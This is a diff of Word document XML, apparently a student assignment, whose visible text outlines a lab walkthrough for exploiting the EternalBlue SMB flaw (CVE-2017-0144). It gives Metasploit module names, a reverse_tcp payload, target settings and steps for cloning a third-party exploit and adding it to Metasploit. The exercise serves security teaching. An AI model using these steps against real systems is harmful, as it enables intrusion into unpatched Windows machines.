+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Read-Host -Prompt "Press Enter to exit"</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -2774,6 +7029,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="48063F71"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="180CE782"/>
+    <w:lvl w:ilvl="0" w:tplc="0C000001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="50B33C1D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EA96158C"/>
@@ -2886,8 +7254,234 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="5D4E4F25"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="2892C908"/>
+    <w:lvl w:ilvl="0" w:tplc="0C000001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C000003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="7E671192"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="5E76631A"/>
+    <w:lvl w:ilvl="0" w:tplc="0C000001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C000001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C000003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C000005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1917982506">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="707412596">
     <w:abstractNumId w:val="0"/>
@@ -2903,6 +7497,15 @@
   </w:num>
   <w:num w:numId="6" w16cid:durableId="996225369">
     <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="7" w16cid:durableId="793252089">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="490289038">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="525412722">
+    <w:abstractNumId w:val="5"/>
   </w:num>
 </w:numbering>
 </file>
@@ -3357,7 +7960,6 @@
     <w:next w:val="Normal"/>
     <w:link w:val="Heading3Char"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
     <w:rsid w:val="000E313D"/>
@@ -3564,7 +8166,6 @@
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="Heading3"/>
     <w:uiPriority w:val="9"/>
-    <w:semiHidden/>
     <w:rsid w:val="000E313D"/>
     <w:rPr>
       <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>

--- a/Opdracht/OpdrachtNPE.docx
+++ b/Opdracht/OpdrachtNPE.docx
@@ -875,21 +875,7 @@
             <w:rStyle w:val="Hyperlink"/>
             <w:lang w:val="nl-BE"/>
           </w:rPr>
-          <w:t>CVE 20</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="nl-BE"/>
-          </w:rPr>
-          <w:t>1</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:lang w:val="nl-BE"/>
-          </w:rPr>
-          <w:t>7-0144</w:t>
+          <w:t>CVE 2017-0144</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -1872,6 +1858,9 @@
           <w:numId w:val="3"/>
         </w:numPr>
         <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:color w:val="auto"/>
+          <w:u w:val="none"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
@@ -1907,27 +1896,27 @@
             <w:szCs w:val="20"/>
             <w:lang w:val="en-US"/>
           </w:rPr>
-          <w:t>https://1drv.ms/u/s</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:sz w:val="20"/>
-            <w:szCs w:val="20"/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>!</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-            <w:sz w:val="20"/>
-            <w:szCs w:val="20"/>
-            <w:lang w:val="en-US"/>
-          </w:rPr>
-          <w:t>AogJDZBrZX0_zJALmPLn_sumFXD4ew?e=tDblwD</w:t>
+          <w:t>https://1drv.ms/u/s!AogJDZBrZX0_zJALmPLn_sumFXD4ew?e=tDblwD</w:t>
         </w:r>
       </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:ind w:left="1440"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>REBUILD LINKS, FILES CHANGED</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2115,7 +2104,6 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -2125,7 +2113,6 @@
         <w:t>cmd</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2141,7 +2128,6 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -2151,7 +2137,6 @@
         <w:t>ipconfig</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2219,7 +2204,6 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -2229,7 +2213,6 @@
         <w:t>ip</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -2271,12 +2254,12 @@
           <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
@@ -2542,18 +2525,8 @@
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>/smb_ms17_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>010</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>/smb_ms17_010</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2687,19 +2660,9 @@
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>reverse_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2809,19 +2772,9 @@
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>eternalblue_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>doublepulsar</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>eternalblue_doublepulsar</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2869,19 +2822,9 @@
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>reverse_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3026,18 +2969,8 @@
           <w:iCs/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">set TARGETARCHITECTURE </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>x64</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>set TARGETARCHITECTURE x64</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3507,6 +3440,506 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Add required architecture for wine32</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dpkg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --add-architecture i386</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Update apt-get</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> apt-get update</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Clone the required exploit (Default ones don't reliably exploit)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>git clone https://github.com/w0rtw0rt/EternalBlue</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Start </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> framework once to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>initialize</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> database</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>exit</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Place </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>eternalblue-doublepulsar.rb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file into the exploits folder</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
